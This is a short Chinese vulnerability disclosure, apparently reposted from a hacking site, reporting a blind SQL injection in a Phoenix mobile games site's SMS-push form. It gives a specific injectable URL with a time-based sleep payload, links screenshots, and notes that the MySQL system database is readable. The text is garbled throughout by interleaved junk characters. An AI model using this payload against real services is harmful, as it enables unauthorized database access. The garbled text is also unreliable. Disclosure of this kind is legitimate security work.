简要描述:
" U1 d4 ]3 @- P: e% e9 p凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。5 @/ x% \2 x" R, i
0 q$ z ^3 }- h$ c, q& ~4 K* c* Y' X详细说明:
6 S9 E3 Y) z' Z! d: ~7 o9 t+ {存在SQL盲注url:
2 ?5 n- o0 G/ S4 R/ hfenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1( P( u+ _! o; R* D6 N: f) a
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png4 p8 ^# p( d& y5 u' ?. `
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png% ]1 \5 P" K- u% o8 e
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
2 v N, ^1 w7 T$ x0 m" |3 g$ y3 x* r& b! b
能看到mysql系统数据库,看来user权限应该很高的。。 |